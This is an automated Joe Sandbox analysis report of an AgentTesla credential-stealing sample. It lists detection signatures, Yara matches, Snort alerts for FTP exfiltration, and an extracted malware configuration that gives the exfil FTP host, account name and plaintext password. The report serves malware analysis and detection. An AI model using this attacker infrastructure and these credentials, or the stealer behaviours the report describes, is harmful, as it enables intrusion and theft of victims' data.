Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
Analysis ID:1459875
MD5:64073b255ae31ff074cb796d8863bce3
SHA1:98a21169f0ea27a70b0a456b0d3e9bf3fe018014
SHA256:1b42d958ccd31edd5a5839eaa6744c3d07d3708dcbc38f4b683d89e1f85dde2c
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 7 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3119b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3120d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31297:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31329:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31393:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31405:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3149b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3152b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2e6d0:$s2: GetPrivateProfileString
                  • 0x2ddf2:$s3: get_OSFullName
                  • 0x2f387:$s5: remove_Key
                  • 0x2f524:$s5: remove_Key
                  • 0x3040e:$s6: FtpWebRequest
                  • 0x3117d:$s7: logins
                  • 0x316ef:$s7: logins
                  • 0x34400:$s7: logins
                  • 0x344b2:$s7: logins
                  • 0x35dba:$s7: logins
                  • 0x35056:$s9: 1.85 (Hash, version 2, native byte-order)
                  2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 15 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:06/20/24-07:24:18.598870
                    SID:2851779
                    Source Port:49737
                    Destination Port:47602
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-07:24:18.182738
                    SID:2029927
                    Source Port:49735
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-07:24:18.598870
                    SID:2855542
                    Source Port:49737
                    Destination Port:47602
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeAvira: detected
                    Found malware configuration
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeVirustotal: Detection: 39%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49735 -> 108.179.234.136:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownFTP traffic detected: 108.179.234.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031DC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783809425.0000000003031000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://wapination.net
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, Login1.csLarge array initialization: : array initializer size 582181
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_0133E0CC0_2_0133E0CC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_07E732800_2_07E73280
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_07E742700_2_07E74270
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_07E700400_2_07E70040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_07E7D2C00_2_07E7D2C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_07E7D2D00_2_07E7D2D0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_08121E100_2_08121E10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_081269780_2_08126978
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_081269690_2_08126969
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_08124A300_2_08124A30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_081252900_2_08125290
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_081252A00_2_081252A0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_0812652F0_2_0812652F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_081265400_2_08126540
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_08121E0C0_2_08121E0C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 0_2_08124E590_2_08124E59
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 2_2_01739BC02_2_01739BC0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 2_2_01734A602_2_01734A60
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 2_2_0173CE502_2_0173CE50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 2_2_01733E482_2_01733E48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeCode function: 2_2_017341902_2_01734190
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.0000000004267000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783310566.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000000.1733361087.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYQOT.exe. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783809425.0000000003031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1790725418.0000000008000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1791655061.0000000008090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983044839.0000000000F98000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983662902.0000000001428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeBinary or memory string: OriginalFilenameYQOT.exe. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
